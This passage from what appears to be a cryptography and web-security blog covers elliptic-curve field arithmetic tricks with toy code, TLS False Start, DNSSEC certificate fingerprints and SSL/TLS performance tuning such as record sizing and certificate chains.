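        point = add(point, point)
        k >>= 1
    return result


a = secrets.randbelow(ORDER - 1) + 1  # Alice's secret number, 1..18
b = secrets.randbelow(ORDER - 1) + 1  # Bob's secret number, 1..18
alice_public = scalar_mult(a, G)      # aG, announced to the room
bob_public = scalar_mult(b, G)        # bG, announced to the room
alice_shared = scalar_mult(a, bob_public)
bob_shared = scalar_mult(b, alice_public)
print(alice_shared == bob_shared)     # both sides derive the same point
```

On a group this small an eavesdropper can simply try all 18 multiples, which is why real curves use fields of a couple of hundred bits or more.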

At this point, we're going to speed up. I'm not going to explain finite fields, I'm going to jump into the tricks of implementation. If you made it this far, well done!

It's important to keep in mind that we have two different structures in play here. We have the elliptic curve group, where we are adding and doubling points on the curve, and we have the underlying field. In order to do operations on the group, we have to do a number of operations on elements of the underlying field. For example, here's the formula for group addition under a Jacobian transform. It's given a cost in terms of the underlying field: 11 multiplications plus five squarings.
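To give a feel for what a transformed formula looks like, here's a sketch of point addition in Jacobian coordinates, where an affine (x, y) is carried as (X, Y, Z) with x = X/Z^2 and y = Y/Z^3. This is the plain textbook formula, not necessarily the faster variant costed above, and the toy prime 17 and the sample points are my own assumptions. The thing to notice is that the addition itself needs no field inversion: the single inversion happens when converting back to affine coordinates.

```python
P = 17  # toy field prime, an assumption for illustration


def to_jacobian(point, z=1):
    """Represent affine (x, y) as (x*z^2, y*z^3, z); any non-zero z works."""
    x, y = point
    return (x * z * z % P, y * z * z * z % P, z % P)


def to_affine(jac):
    """Undo the transformation with a single field inversion."""
    X, Y, Z = jac
    z_inv = pow(Z, -1, P)
    return (X * z_inv * z_inv % P, Y * z_inv * z_inv * z_inv % P)


def jacobian_add(p, q):
    """Add two points, assuming neither is infinity and p is not +/-q."""
    X1, Y1, Z1 = p
    X2, Y2, Z2 = q
    Z1Z1 = Z1 * Z1 % P
    Z2Z2 = Z2 * Z2 % P
    U1 = X1 * Z2Z2 % P
    U2 = X2 * Z1Z1 % P
    S1 = Y1 * Z2 * Z2Z2 % P
    S2 = Y2 * Z1 * Z1Z1 % P
    H = (U2 - U1) % P
    R = (S2 - S1) % P
    HH = H * H % P
    HHH = H * HH % P
    V = U1 * HH % P
    X3 = (R * R - HHH - 2 * V) % P
    Y3 = (R * (V - X3) - S1 * HHH) % P
    Z3 = H * Z1 * Z2 % P
    return (X3, Y3, Z3)


# (5, 1) and (6, 3) lie on the toy curve y^2 = x^3 + 2x + 2 mod 17.
p = to_jacobian((5, 1), z=3)
q = to_jacobian((6, 3))
print(to_affine(jacobian_add(p, q)))  # (10, 6), matching the affine chord rule
```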

Our job is to do these group and field operations quickly and in constant time. The latter is important! Look at the power of the timing attacks against AES and RSA!

Limb schedules

If the order of the field is between 2^(n-1) and 2^n then we call it an n-bit field. (The order can't be 2^n for n > 1 because the order must be prime and 2^n is even.)

For cryptographically useful field sizes, elements aren't going to fit in a single register. Therefore we have to represent field elements with a number of limbs (which we'll call a, b, c, ...). If we were working in a field of size 2^127 - 1 then we might represent field elements with two limbs by 2^64×a + b. Think of it as a two digit number in base 2^64.

Since we're using a pair of 64-bit limbs and we're probably putting them in 64-bit registers this is a uniform, saturated (because the registers are full) limb schedule. As a is multiplied by 2^64 we say that it's “at 2^64”.

However, we're going to hit some issues with this scheme. Think about squaring these field elements (multiplication is the same, but I would need more variables). Squaring means calculating a^2 + 2ab + b^2. That results in limbs at 2^0 (b^2), 2^64 (the middle term) and 2^128 (a^2).

But multiplying the 64-bit limbs gives a 128-bit result (x86-64 chips can do that, although you need some tricks to pull it off from C code). When it comes to the middle term, you can't multiply the 128-bit result by 2 without overflowing. You would have to process the result into a form which you could manipulate. Also, if you look at the algorithms which we're implementing, there are small scalar factors and subtractions, both of which are much easier to do with some headroom.

So we could consider an unsaturated schedule. For example, for a 224-bit field, four 56-bit limbs work well. It's still uniform, but the results of multiplication are only 112-bit, so you can add several of those numbers together in a 128-bit limb without overflowing.
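As a rough sketch of that unsaturated schedule, the following splits a 224-bit value into four 56-bit limbs and does a schoolbook multiplication without any carrying. Python integers don't overflow, so the code checks explicitly that each accumulated limb would still fit in 128 bits; the helper names are my own.

```python
LIMB_BITS = 56
NUM_LIMBS = 4
MASK = (1 << LIMB_BITS) - 1


def to_limbs(value):
    """Split a value below 2^224 into four 56-bit limbs, least significant first."""
    return [(value >> (LIMB_BITS * i)) & MASK for i in range(NUM_LIMBS)]


def from_limbs(limbs):
    """Recombine limbs, where limb i sits at 2^(56*i)."""
    return sum(limb << (LIMB_BITS * i) for i, limb in enumerate(limbs))


def mul_limbs(a, b):
    """Schoolbook product: seven unreduced limbs, with no carries propagated."""
    out = [0] * (2 * NUM_LIMBS - 1)
    for i, ai in enumerate(a):
        for j, bj in enumerate(b):
            out[i + j] += ai * bj  # each product is below 2^112
    return out


x = 2**224 - 1            # worst case: every limb is full
y = 2**223 + 12345
product = mul_limbs(to_limbs(x), to_limbs(y))
print(from_limbs(product) == x * y)
print(max(product).bit_length())  # stays well under 128 bits
```

At most four 112-bit products are summed into any one limb, so the largest accumulated value is below 2^114, leaving headroom for the small scalar factors mentioned above.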

There are also non-uniform schedules. For a 255-bit field, a schedule of 25, 26, 25, 26, ... for ten limbs works well. However, it's best to keep the schedule as uniform as possible. Otherwise, when multiplying, you end up with values at odd positions and might not have enough headroom to shift them in-place to match up with a limb position.

Prime structures

When implementing curves you typically don't get to choose the prime. There are a few standard primes defined by NIST (in FIPS 186-3) and less common ones (like curve25519).

The structure of the prime matters because the most complex operation will be the reduction. When we did a squaring in the example above, we ended up with a term at 128 bits. We have to eliminate that otherwise, as we keep multiplying results, the results will just get bigger and bigger.

If you think of reducing 2^127 modulo 2^127 - 1, I hope it's clear that the result is one. If you had a limb at 127 bits, then you could just take that value, add it in at 0 bits and drop the limb at 127 bits. A limb at 127 bits ‘reflects’ off the term at 2^0 and ends up getting added in at 0 bits.

Since we had a limb at 128 bits, its reflection off that term ends up at 1 bit. So we would have to left shift the limb by one before adding it in at 0. (And hope that your limb schedule gave you some headroom to do the left shift!) That's pretty much an ideal case and 2^127 - 1 is called a Mersenne prime. Sadly, there aren't any between 2^127 - 1 and 2^521 - 1, so you'll probably get something harder.
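The Mersenne case is simple enough to sketch on whole integers rather than limbs. This is only an illustration of the folding idea, with a loop that a real constant-time implementation would replace with a fixed number of steps:

```python
P127 = (1 << 127) - 1  # the Mersenne prime 2^127 - 1


def reduce_mersenne(x):
    """Reduce a non-negative integer mod 2^127 - 1 by folding high bits onto low."""
    while x >> 127:
        # 2^127 is congruent to 1, so the high part can be added in at bit 0.
        x = (x & P127) + (x >> 127)
    return 0 if x == P127 else x


print(reduce_mersenne(1 << 127))  # 1: a bit at 127 reflects to bit 0
print(reduce_mersenne(1 << 128))  # 2: a bit at 128 reflects to bit 1
```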

Take NIST's P256 curve. Here the prime is 2^256 - 2^224 + 2^192 + 2^96 - 1. It was designed so that, with 32-bit limbs, all the reflections end up on 32-bit boundaries. However, we have 64-bit systems these days and we really don't want to waste those big 64-bit full multipliers. However, the prime is nasty for other limb structures. That term at 224 bits is so high up that reflections off it usually end up above 256 and get reflected again. That's terrible if your limbs don't line up with the reflections. For example, if you try 52-bit, unsaturated limbs with that prime, then the reflections for the limb at 416 bits are at 224, 192, 160, 128, 96, 64, 32, and 0 bits! With all that shifting and adding (and more because you don't have enough headroom for all those shifts), you end up with a slow reduction.

I have typically ended up experimenting with different limb schedules and seeing which is the fastest. You can get a rough feeling for how well a given schedule will do but, with CPUs being so complex these days, it's never terribly clear which will be the fastest without trying them.

Inversion

The usual way to do inversion in a finite field is with Euclid's algorithm. However, this isn't constant time. Thankfully, we can use Fermat's little theorem (x^p ≡ x (mod p)) and notice that it easily follows that x^(p-2) ≡ x^(-1) (mod p). So, just raise the element to the power of p - 2. It's a long operation, but you don't do it very often.

(Credit to djb for that trick.)
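In Python the idea fits in one line. Note that Python's built-in pow makes no constant-time promises, so this only illustrates the arithmetic; a real implementation would use a fixed chain of field squarings and multiplications. The prime below is the curve25519 field prime, picked just as an example.

```python
def invert(x, p):
    """Return x^(p-2) mod p, the inverse of x, assuming p is prime and p doesn't divide x."""
    return pow(x, p - 2, p)


p = 2**255 - 19
x = 123456789
x_inv = invert(x, p)
print(x * x_inv % p)  # 1
```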

Subtraction

Although you can use signed limbs, I consider the complexity to be too much to bother with. But, without signed limbs how do you do subtraction?

Well, everything is modulo p, so we can always add 0 mod p. If you have unsaturated limbs then the top bits of the limb overlap with the bottom bits of the next limb. So, you can add a large number to the first limb and subtract a small number from the next one. But what stops the next limb from underflowing? Well, you want to add the same large number there and subtract from the next etc.

This continues until you reach the top limb. Here, you can calculate the excess, reduce modulo p and correct the lower limbs to counteract it. In the end, you end up with a few, static values which you can quickly add to a field element without changing the element value, but so that you can now prove that the subtraction doesn't underflow any limbs.

(Credit to Emilia Kasper for that one.)
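Here's my attempt at working that through for four 56-bit limbs and the P224 prime, 2^224 - 2^96 + 1. Adding 2^58 to every limb and subtracting 4 from the limb above cancels out, except at the top where the excess is 2^226. That reduces to 2^98 - 4 modulo p, which is corrected by subtracting 2^42 from the second limb and adding 4 to the first. The constants are derived here for illustration, so treat them as a sketch rather than a copy of any particular implementation.

```python
LIMB_BITS = 56
P224 = 2**224 - 2**96 + 1  # the NIST P224 prime

# Limbs of 4*p, arranged so that every limb is a little under or over 2^58.
ZERO_MOD_P = [
    2**58 + 4,          # limb at 2^0
    2**58 - 2**42 - 4,  # limb at 2^56
    2**58 - 4,          # limb at 2^112
    2**58 - 4,          # limb at 2^168
]


def from_limbs(limbs):
    """Recombine limbs, where limb i sits at 2^(56*i)."""
    return sum(limb << (LIMB_BITS * i) for i, limb in enumerate(limbs))


def sub_limbs(a, b):
    """Compute a - b mod p limb by limb, assuming every limb of b is below 2^57."""
    return [ai + zi - bi for ai, zi, bi in zip(a, ZERO_MOD_P, b)]


a = [5, 0, 7, 1]
b = [2**57 - 1, 3, 2**56, 9]
diff = sub_limbs(a, b)
print(from_limbs(ZERO_MOD_P) == 4 * P224)   # the constants really are 0 mod p
print(all(limb >= 0 for limb in diff))      # no limb underflowed
print(from_limbs(diff) % P224 == (from_limbs(a) - from_limbs(b)) % P224)
```

Every constant is larger than 2^57, so as long as the limbs being subtracted are below 2^57 no limb can go negative.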

Remarks

I could write a lot more, but it's getting late. The reason for this write up is that I'm currently working on a fast P256 implementation for OpenSSL. It won't be as fast as I would like due to the issues with the P256 prime, given above. But, I hope to be done by the end of the week and hope to have some exciting news about it in the new year.

Google Charts API over HTTPS

I'm happy to announce that the Google Charts API is now available over HTTPS at https://chart.googleapis.com. For example:

The documentation should be updated in due course.

Random number generators in Psi experiments

(Note: I'm not making any comment on the research in question, merely making a technical remark.)

In Feeling the Future, the author, D. Bem, has an interesting problem (page 11 of the linked preprint). If an experiment shows that people can predict the output of a RNG, what does that tell us?

Well, if the RNG was a PRNG, seeded at the beginning of the experiment, then the subject could either be showing precognition (i.e. they can sense the result from the future) or clairvoyance (i.e. they can sense the state of the PRNG and thus know the next result). If you clock a true, hardware RNG before the trial then the same possibilities arise.

If you clock a true RNG after the trial however, then the possibilities are precognition and psychokinesis (i.e. the subject altered the state of the RNG, causing the result).

My observation was that you could XOR a PRNG and a RNG. (The latter being clocked after the trial.) In this case, prediction implies, at least, either both clairvoyance (for the PRNG) and psychokinesis (for the RNG), or precognition. That appears to be a useful trick.

However, this rather relies on the result that the sum of two RNGs is at least as random as the best of them. If we have a result which suggests precognition, then that doesn't hold! An evil RNG could, when summed with a true RNG, predict its future output and cancel it out, resulting in a less random result!
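For concreteness, the XOR construction might look something like this. The operating system's random source stands in for a true hardware RNG, which is an assumption on my part, and the function names are made up.

```python
import random
import secrets


def make_trial_source(seed):
    """Return a function giving one bit per trial: PRNG bit XOR 'true' RNG bit."""
    prng = random.Random(seed)  # seeded once, before the experiment starts

    def next_bit():
        pseudo_bit = prng.getrandbits(1)  # already determined by the seed
        true_bit = secrets.randbits(1)    # stand-in for an RNG clocked after the trial
        return pseudo_bit ^ true_bit

    return next_bit


next_bit = make_trial_source(seed=2010)
bits = [next_bit() for _ in range(16)]
print(bits)
```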

Changing HTTPS

At Google we're pretty fanatical about speed. We know that when things run faster people aren't just happier to use them, but that it fundamentally changes the way that people use them. That's why we strive to make Chrome the fastest browser possible and include experiments like SPDY.

As part of this, we've been looking at SSL/TLS, the protocol which secures HTTPS. We love SSL/TLS because of the privacy and security that it gives to our users and, like everything, we want to make it faster.

One of the simplest changes that we're experimenting with is called False Start. It can shave a round trip from the setup time of many HTTPS connections. A round trip varies depending on how far away the webserver is from the client. Crossing the continental US and back takes about 70ms. Going from the west coast to Europe and back takes about 150ms.

That might not seem like very much. But these costs are multiplied when loading a complex site. If it takes an extra 100ms to start fetching the contents of the page, then that's 100ms until the browser discovers resources on other websites that will be needed to render its contents. If loading those resources reveals more dependents then they are delayed by three round trips.

And this change disproportionately benefits smaller websites (who aren't multihomed around the world) and mobile users or areas with poorer Internet connectivity (who have longer round trip times).

Most attractively, this change can be made unilaterally. Browsers can implement False Start and benefit without having to update webservers.

However, we are aware that this change will cause issues with about 0.05% of websites on the Internet. There are a number of possible responses to this:

The most common would be to admit defeat. Rightly or wrongly, users assign blame to the last thing to change. Thus, no matter how grievous or damaging their behaviour, anything that worked at some point in the past is regarded as blameless for any future problem. As the Internet becomes larger and more diverse, more and more devices are attached that improperly implement Internet protocols. This means that any practice that isn't common is likely to be non-functional for a significant number of users.

In light of this, many efforts which try to make lower level changes fail. Others move on top of common protocols in the hope that bugs in the network don't reach that high.

Chrome still carries an idealism that means that we're going to try to make low level changes and try to make them work.

The second common response to these problems is to work around them. This means detecting when something has gone wrong and falling back to the old behaviour. In the specific case of False Start, detecting the failure is problematic. However, even if it were not, then we still wouldn't want to work around the issue because we think that it's damaging to the Internet in its own way.

Fallbacks allow problematic sites to continue to function and stem the flow of angry users. That alone makes it very attractive to developers. However, it also removes any motivation for the sites to change. In most cases, it means that sites will never even know about the issue. Fallbacks do nothing to move the world towards a position where the change in question functions correctly.

Additionally, fallbacks add more unwritten rules and complexity. As an example, take the change from SSLv3 to TLS 1.0. This was a change to the same SSL/TLS protocol that False Start changes and it was finalised as a standard nearly 12 years ago. TLS 1.0 was designed so that browsers could talk to older SSLv3 websites without issues. The only slight problem was that some webservers needed to be updated to ignore some extra data that TLS 1.0 clients would send. A very minor change.

In order to make the transition smoother, browsers added a fallback from TLS to SSLv3. The Internet in 1999 was a much smaller and more flexible place. It was assumed that the problematic webservers could be fixed in a few years and the fallback could be removed.

Twelve years later, the fallback is in robust health and still adding complexity. A security update to TLS earlier this year was made much more complex by the need to account for SSLv3 fallback. The operators of the problematic webservers are largely unaware of the problems that they are causing and have no incentive to change in any case. Meanwhile, the cost of SSLv3 fallback continues to accumulate.

Because of these problems, we're going to try a new approach with False Start: blacklists.

Chrome (on the dev channel at first) will contain a list of the 0.05% of problematic sites and we won't use False Start with them. We're generating this list by probing a large list of websites although, of course, we'll miss some which we'll have to address from bug reports.

Blacklisting gives us two advantages. Firstly, it limits the accumulation of new problematic websites. Sites which have never worked are a very different case from sites which used to work.

Secondly, we can contact the problematic sites in question. We already have a good idea of where the problem lies with many of them and we're in contact with the stakeholders to plan a way forward.

Blacklists require effort to maintain and we'll have to be responsive to make it work. But, with our near-weekly dev channel and even more frequently updated Canary channel, we think that we can do it. In the end, success will be measured by whether we manage to make the Internet a safe place to implement False Start and by how much we manage to reduce the blacklist over time.

DNSSEC and TLS

Ever since the DNS root was signed on July 15th, quite a few people have been wondering about the interaction of TLS and DNSSEC. On the one hand, trust in the CA system is lukewarm but, on the other, the deployment issues with getting DNSSEC to the client seem immense.

Those who saw Dan Kaminsky's talk at BlackHat, which included a patched version of Chromium performing DNSSEC validation, have probably already guessed that Dan, myself and others have been working on this problem. In this blog post I'm going to try to explain the design space as I see it.

Objectives

In the long term, we want a stronger foundation of trust for the Internet. This means both paring back the power of the 1500 root certificates and making TLS easier to deploy and thus more commonly used.

So one of the goals is to serve sites which currently don't have a CA signed certificate. We can do that by allowing them to publish fingerprints in DNS and having browsers accept those (DNSSEC secured) fingerprints.

There might also be speed advantages to be had by avoiding OCSP and CRL lookups.

We also want to serve those sites which currently do have CA signed certificates. For them we can provide exclusion of other certificates issued either mistakenly or maliciously by CAs.

Yet it's important to note that this isn't a plan for the elimination of CAs. CAs are still a good way to link DNS names to legal entities. For that we need EV certificates and CAs to issue them.

The Design Space

Firstly we have the issues which are, in many respects, the least important. How should we encode the data?

What type of record? The two major candidates are a TXT record and a new type of CERT record. It's important that we figure it out as DNS queries can only ask for one type of response (ignoring ANY, which we don't want) and each query is another chance for packet loss and a painful timeout.

TXT records have the advantage that the crippled web interfaces, by which many people manage their DNS, often support them. They are also already common (try looking up TXT records for google.com, amazon.com etc). They are human readable. They are easily extendable given a sensible format.

A new CERT type is the ‘cleaner’ solution. Stuffing things in TXT records is clearly a hack and working around crappy web interfaces feels like being a good man standing still.

Where to put the record? If one were to use a TXT record then the temptation would be to put it on a prefix label like _tls.www.example.com. However, if www.example.com is a CNAME then we won't get a helpful answer: probably just an NXDOMAIN and we'll have to hunt around: taking many round trips and a painful latency hit. Because of this, I like putting the record on the target domain name.

Next we'll consider some of the deployment options because they inform some of the points to follow.

What about clients without DNSSEC resolution ability? This is a big question. We don't care if your ISP's resolver is going to set the AD (Authenticated Data) bit in DNS replies: we don't trust it. We need either a local recursive resolver or we need the full DNSSEC chain so that we can check the signatures ourselves.

(It's worth pointing out that, although we can't trust any fingerprint information without DNSSEC, we can provide exclusion without DNSSEC. It's a bit of a weak threat model: the attacker would have to control some of your network but not your DNS resolutions: maybe you have the records cached with a long TTL.)

One option is to put an aggressive DNSSEC resolver in the client and set DO (DNSSEC OK) and CD (Checking Disabled) bits in the requests to get the signatures themselves.

What about clients which can't even do DNS resolution correctly? (Also known as the Hotel Network Problem.) For them we could tunnel DNS over HTTP. In fact, if you encode the request in a GET request you can set the HTTP caching headers so that HTTP caches are DNS caches too (Dan's trick).

If we're talking over HTTP, why not get the server to give us the whole chain? In that case, what about an EDNS0 option to ask for the full chain? Both are possibilities.

How about putting the DNSSEC chain in other protocols? What about embedding the chain in an X.509 certificate? Chain embedding can solve the needs of sites which want to use self-signed certificates.

Now we can start to get to some of the more meaty issues:

Fingerprint in record? If you only have a single certificate then you want to put the fingerprint in a record on the domain name. That way the client can start the lookup at the same time as for the A record. But if you have many fingerprints, that becomes troublesome and you want to look up a domain named by the fingerprint. That's slower because you can only start that lookup once you have the certificate from the server. The answer looks to be that one has to handle both types of lookup.

What to hash? If we are going to embed a DNSSEC chain in a certificate, then the fingerprint can't cover the whole certificate (because then the hash would have to cover itself). So that suggests hashing only the public key. However, if we do that then the attacker can change other parts of the certificate at will.

Here we have a bit of an impedance mismatch with the X.509 world. Existing APIs are usually of the form “please validate this certificate”. Once validated, everything in the certificate is trusted because CAs are the Voice of God. However, in a DNSSEC world, authority is scoped.

If we hash only the public key then an attacker could include things in an X.509 certificate for example.com which would appear to have the authority of example.com to an unsuspecting application. If we hash the whole certificate then example.com could put things in its certificate which might assert things which example.com shouldn't be allowed to. Applications which work on the Voice of God model could be misled.

It's tricky. At the moment we are supporting both models.
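The difference between the two hashing choices can be seen with a toy example. The byte strings below are made-up stand-ins for a real certificate and its public key, and SHA-256 is my assumption for the fingerprint function.

```python
import hashlib


def fingerprint(data: bytes) -> str:
    """Hex SHA-256 digest, standing in for whatever fingerprint is published in DNS."""
    return hashlib.sha256(data).hexdigest()


# Hypothetical stand-ins: two certificates carrying the same public key.
public_key = b"hypothetical-public-key-bytes"
cert_original = b"subject=example.com;" + public_key + b";extra=none"
cert_modified = b"subject=example.com;" + public_key + b";extra=attacker-chosen"

# Hashing only the key: both certificates match the published fingerprint.
print(fingerprint(public_key) == fingerprint(public_key))
# Hashing the whole certificate: any change outside the key is detected.
print(fingerprint(cert_original) == fingerprint(cert_modified))
```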

Should we include a flag to perform CA validation in addition? For performance reasons, people might want to use just DNSSEC because one can avoid OCSP and CRL lookups that way. For EV certs, we certainly want to perform CA validation in addition, but what about DV certs? Some people might like the idea of enforcing the expiry and OCSP checks.

TLS extensions? Embedding a DNSSEC chain in an X.509 certificate means that you need to regenerate the certificate once a week or so (because DNSSEC signatures expire). Also, CAs aren't going to sign certificates with a random blob of binary data that they don't understand. Because of this, it's been suggested that we could carry the DNSSEC chain in a TLS extension. However, chain embedding is for those servers which don't have a CA issued certificate. Clients aren't going to be able to require DNSSEC for many years, if ever. And if we're going to accept CA certificates without DNSSEC, then an embedded chain can't provide exclusion.

The Code

The code is minimal so far. Chrome trunk already includes support for validating DNSSEC chains embedded inside an X.509 cert, although it requires a command line flag to enable. I also have code to generate the chains. However, the format of the chain is going to change so I'm not making that public yet.

Hopefully there will be something more substantial in a couple of months.

SSL Survey

Ivan Ristić has put together a fantastic survey of the state of SSL/TLS on the web. Some highlights include:

  • 50% of the root CAs in Firefox appear to be unused.
  • 44% of sites send unneeded certificates in their chains.
  • 99% of sites work with only 23 roots.
  • A total of 3 DSA keys from all valid sites found.
  • 50% of servers still support SSLv2
  • Almost nobody uses TLS 1.1 or 1.2
  • Only 12 sites support STS :(
  • 20.5% support the reneg extension.
  • (32% support insecure renegotiation.)

Clipping in Chromium

I'm a guest poster on the Chromium Notes blog today, talking about clipping in Skia and Chromium.

Overclocking SSL

(This is a write up of the talk that I gave at Velocity 2010 last Thursday. This is a joint work of myself, Nagendra Modadugu and Wan-Teh Chang.)

The ‘S’ in HTTPS stands for ‘secure’ and the security is provided by SSL/TLS. SSL/TLS is a standard network protocol which is implemented in every browser and web server to provide confidentiality and integrity for HTTPS traffic.

If there's one point that we want to communicate to the world, it's that SSL/TLS is not computationally expensive any more. Ten years ago it might have been true, but it's just not the case any more. You too can afford to enable HTTPS for your users.

In January this year (2010), Gmail switched to using HTTPS for everything by default. Previously it had been introduced as an option, but now all of our users use HTTPS to secure their email between their browsers and Google, all the time. In order to do this we had to deploy no additional machines and no special hardware. On our production frontend machines, SSL/TLS accounts for less than 1% of the CPU load, less than 10KB of memory per connection and less than 2% of network overhead. Many people believe that SSL takes a lot of CPU time and we hope the above numbers (public for the first time) will help to dispel that.

If you stop reading now you only need to remember one thing: SSL/TLS is not computationally expensive any more.

The first part of this text contains hints for SSL/TLS performance and then the second half deals with things that Google is doing to address the latency that SSL/TLS adds.

Basic configuration

Modern hardware can perform 1500 handshakes/second/core. That's assuming that the handshakes involve a 1024-bit RSA private operation (make sure to use 64-bit software). If your site needs high security then you might want larger public key sizes or ephemeral Diffie-Hellman, but then you're not the HTTP-only site that this presentation is aimed at. But pick your certificate size carefully.

It's also important to pick your preferred ciphersuites. Most large sites (Google included) will try to pick RC4 because it's very fast and, as a stream cipher, doesn't require padding. Recent Intel chips (Westmere) contain AES instructions which can make AES the better choice, but remember that there's no point using AES-256 with a 1024-bit public key. Also keep in mind that ephemeral Diffie-Hellman (EDH or DHE) ciphersuites will handshake at about half the speed of pure RSA ciphersuites. However, with a pure RSA ciphersuite, an attacker can record traffic, crack (or steal) your private key at will and decrypt the traffic retrospectively, so consider your needs.

OpenSSL tends to allocate about 50KB of memory for each connection. We have patched OpenSSL to reduce this to about 5KB and the Tor project have independently written a similar patch that is now upstream. (Check for SSL_MODE_RELEASE_BUFFERS in OpenSSL 1.0.0a.) Keeping memory usage down is vitally important when dealing with many connections.

Resumption

There are two types of SSL/TLS handshake: a full handshake and an abbreviated handshake. The full handshake takes two round trips (in addition to the round trip from the TCP handshake):

The abbreviated handshake occurs when the connection can resume a previous session. This can only occur if the client has the previous session information cached. Since the session information contains key material, it's never cached on disk so the attempted client resume rate, seen by Google, is only 50%. Older clients also require that the server cache the session information. Since these old clients haven't gone away yet, it's vitally important to set up a shared session cache if you have multiple frontend machines. The server-side miss rate at Google is less than 10%.

An abbreviated handshake saves the server performing an RSA operation, but those are cheap anyway. More importantly, it saves a round-trip time:

Addressing round trips is a major focus of our SSL/TLS work at Google (see below).

Certificates

We've already mentioned that you probably don't want to use 4096-bit certificates without a very good reason, but there are other certificate issues which can cause a major slowdown.

Firstly, most certificates from CAs require an intermediate certificate to be presented by the server. Rather than have the root certificate sign the end certificates directly, the root signs the intermediate and the intermediate signs the end certificate. Sometimes there are several intermediate certificates.

If you forget to include an intermediate certificate then things will probably still work. The end certificate will contain the URL of the intermediate certificate and, if the intermediate certificate is missing, the browser will fetch it. This is obviously very slow (a DNS lookup, TCP connection and HTTP request blocking the handshake to your site). Unfortunately there's a constant pressure on browsers to work around issues and, because of this, many sites which are missing certificates will never notice because the site still functions. So make sure to include all your certificates (in the correct order)!

There's a second certificate issue that can increase latency: the certificate chain can be too large. A TCP connection will only send so much data before waiting to hear from the other side. It slowly ramps this amount up over time, but a new TCP connection will only send (typically) three packets. This is called the initial congestion window (initcwnd). If your certificates are large enough, they can overflow the initcwnd and cause an additional round trip as the server waits for the client to ACK the packets:

For example, www.bankofamerica.com sends four certificates: 1624 bytes, 1488 bytes, 1226 bytes and 576 bytes. That will overflow the initcwnd, but it's not clear what they could do about that if their CA really requires that many intermediate certificates. On the other hand, edgecastcdn.net has a single certificate that's 4093 bytes long, containing 107 hostnames!
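To make the arithmetic concrete, here's a rough sketch of that check. The 1460-byte segment size and the function name are my assumptions for illustration, and the check only counts certificate bytes: the ServerHello and the other handshake messages share the same flight, so the real headroom is smaller than this suggests.

```c
#include <assert.h>
#include <stddef.h>

/* Returns 1 if the certificates alone need more bytes than the server may
 * send before the first ACK, and 0 otherwise. mss and initcwnd_packets are
 * supplied by the caller; 1460 and 3 are assumed typical values. */
int chain_overflows_initcwnd(const size_t *cert_sizes, size_t num_certs,
                             size_t mss, size_t initcwnd_packets) {
  size_t total = 0, i;

  assert(cert_sizes != NULL || num_certs == 0);
  for (i = 0; i < num_certs; i++)
    total += cert_sizes[i];

  return total > mss * initcwnd_packets;
}
```

With those assumptions, three packets carry 4380 bytes. The four certificates above sum to 4914 bytes and overflow it, while a single 4093-byte certificate squeezes under on its own, leaving very little room for everything else in the handshake.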

Packets and records

SSL/TLS packages the bytes of the application protocol (HTTP in our case) into records. Each record has a signature and a header. Records are packed into packets and each packet has headers. The overhead of a record is typically 25 to 40 bytes (based on common ciphersuites) and the overhead of a packet is around 52 bytes. So it's vitally important not to send lots of small packets with small records in them.
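A quick sketch of why small records hurt, using the overhead figures above. The function names are made up for this example, and it assumes the worst case of one record per packet.

```c
#include <assert.h>
#include <stddef.h>

/* Bytes on the wire when `payload` application bytes travel as a single
 * record in a single packet. */
size_t wire_bytes(size_t payload, size_t record_overhead,
                  size_t packet_overhead) {
  return payload + record_overhead + packet_overhead;
}

/* Percentage of the wire bytes that is application data, rounded down. */
unsigned payload_percent(size_t payload, size_t record_overhead,
                         size_t packet_overhead) {
  size_t total = wire_bytes(payload, record_overhead, packet_overhead);

  assert(total > 0);
  return (unsigned)(payload * 100 / total);
}
```

With 25 bytes of record overhead and 52 bytes of packet overhead, an 18-byte write sent on its own costs 95 bytes on the wire, so less than a fifth of it is useful data. A 1400-byte record in the same situation is about 94% payload.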

I don't want to be seen to be picking on Bank Of America, it's honestly just the first site that I tried, but looking at their packets in Wireshark, we see many small records, often sent in a single packet. A quick sample of the record sizes: 638 bytes, 1363, 15628, 69, 182, 34, 18, … This is often caused because OpenSSL will build a record from each call to SSL_write and the kernel, with Nagle disabled, will send out packets to minimise latency.

This can be fixed with a couple of tricks: buffer in front of OpenSSL and don't make SSL_write calls with small amounts of data if you have more coming. Also, if code limitations mean that you are building small records in some cases, then use TCP_CORK to pack several of them into a packet.
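Here's a minimal sketch of the buffering idea. It's not code from any real server: the names are hypothetical, the 1400-byte capacity is an assumed target, and the sink callback stands in for a call to SSL_write so that the example is self-contained.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define COALESCE_CAP 1400 /* assumed target record size; tune for your setup */

/* Stand-in for SSL_write: receives one coalesced chunk of data. */
typedef void (*sink_fn)(void *ctx, const unsigned char *data, size_t len);

struct coalescer {
  unsigned char buf[COALESCE_CAP];
  size_t used;
  sink_fn sink;
  void *sink_ctx;
};

/* Example sink that only counts what it is given. */
struct write_stats { size_t calls, bytes; };

void counting_sink(void *ctx, const unsigned char *data, size_t len) {
  struct write_stats *stats = ctx;
  (void)data;
  stats->calls++;
  stats->bytes += len;
}

void coalescer_init(struct coalescer *c, sink_fn sink, void *sink_ctx) {
  assert(c != NULL && sink != NULL);
  c->used = 0;
  c->sink = sink;
  c->sink_ctx = sink_ctx;
}

/* Hand whatever is buffered to the sink as a single write. */
void coalescer_flush(struct coalescer *c) {
  if (c->used > 0) {
    c->sink(c->sink_ctx, c->buf, c->used);
    c->used = 0;
  }
}

/* Queue data, only writing once a full buffer has accumulated. */
void coalescer_write(struct coalescer *c, const unsigned char *data,
                     size_t len) {
  while (len > 0) {
    size_t room = COALESCE_CAP - c->used;
    size_t n = len < room ? len : room;

    memcpy(c->buf + c->used, data, n);
    c->used += n;
    data += n;
    len -= n;
    if (c->used == COALESCE_CAP)
      coalescer_flush(c);
  }
}
```

Twenty 100-byte writes through this turn into two sink calls (1400 bytes and then 600 on the final flush) rather than twenty tiny records. Remember to flush when you have nothing more coming, otherwise you trade overhead for latency.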

But don't make the records too large either! See the 15KB record that https://www.bankofamerica.com sent? None of that data can be parsed by the browser until the whole record has been received. As the congestion window opens up, those large records tend to span several windows and so there's an extra round trip of delay before the browser gets any of that data. Since the browser is pre-parsing the HTML for subresources, it'll delay discovery and cause more knock-on effects.

So how large should records be? There's always going to be some uncertainty in that number because the size of the TCP header depends on the OS and the number of SACK blocks that need to be sent. In the ideal case, each packet is full and contains exactly one record. Start with a value of 1415 bytes for a non-padded ciphersuite (like RC4), or 1403 bytes for an AES based ciphersuite and look at the packets which result from that.

OCSP and CRLs

